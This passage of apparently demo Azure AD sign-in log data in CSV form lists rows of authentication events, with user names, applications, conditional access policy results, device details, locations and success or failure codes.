True}",b06f2f2f-9329-4168-a2cd-5754bb1d0800,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,b06f2f2f-9329-4168-a2cd-5754bb1d0800,SigninLogs,Sucess,51.4458313,-0.969720006
+770,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:39.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,94cffed0-4baa-4b97-86d0-9876ba9fbdf4,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 07:45,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",b6b1e129-7976-4148-98ee-f605b7d80d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,b6b1e129-7976-4148-98ee-f605b7d80d00,SigninLogs,Sucess,50.6406517,5.572050095
+771,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:25.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,e6b6e92d-8fef-4931-957a-03f9f23b11ce,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,[],notApplied,09/04/2020 09:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",38cd5596-4cf3-4adc-be55-e3febc025000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",e6b6e92d-8fef-4931-957a-03f9f23b11ce,e6b6e92d-8fef-4931-957a-03f9f23b11ce,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,38cd5596-4cf3-4adc-be55-e3febc025000,SigninLogs,Failed,32.32146072,34.85319901
+772,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:14.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0210db31-4bbd-4562-aea8-1e521361aa1a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 07:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",5afde7f0-808d-4fd5-9a61-613468bc0d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5afde7f0-808d-4fd5-9a61-613468bc0d00,SigninLogs,Sucess,36.6404686,-78.26995087
+773,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:08.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,93fb8ef5-0ca8-4d61-bb5c-4d29418af3cb,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 07:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e446f264-3933-463f-bc0b-d4229cd60e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e446f264-3933-463f-bc0b-d4229cd60e00,SigninLogs,Sucess,36.6404686,-78.26995087
+774,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:04.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0bc15ec5-c6b9-48c9-b8f1-7fb9b82aec51,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",b6b1e129-7976-4148-98ee-f60588270e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,b6b1e129-7976-4148-98ee-f60588270e00,SigninLogs,Sucess,50.6406517,5.572050095
+775,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:46.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2fcfc429-d4d5-4f1a-b11f-08941b05341d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",973ebc26-a5be-4a53-afb2-eb0848870e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,973ebc26-a5be-4a53-afb2-eb0848870e00,SigninLogs,Sucess,50.6406517,5.572050095
+776,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:50.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e32d84c-6280-428c-a7e0-c0fcfe8a7633,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",4b3b6568-59df-4325-834b-0ff61f020c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,4b3b6568-59df-4325-834b-0ff61f020c00,SigninLogs,Sucess,50.6406517,5.572050095
+777,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:25.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,e6b6e92d-8fef-4931-957a-03f9f23b11ce,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,[],notApplied,09/04/2020 09:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",38cd5596-4cf3-4adc-be55-e3febc025000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",e6b6e92d-8fef-4931-957a-03f9f23b11ce,e6b6e92d-8fef-4931-957a-03f9f23b11ce,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,38cd5596-4cf3-4adc-be55-e3febc025000,SigninLogs,Failed,32.32146072,34.85319901
+778,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:45.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c268d2a-fcf4-4a58-af8a-89478f683f35,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",de685954-2e2a-4f4b-8b35-c75c60dc0e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,de685954-2e2a-4f4b-8b35-c75c60dc0e00,SigninLogs,Sucess,50.6406517,5.572050095
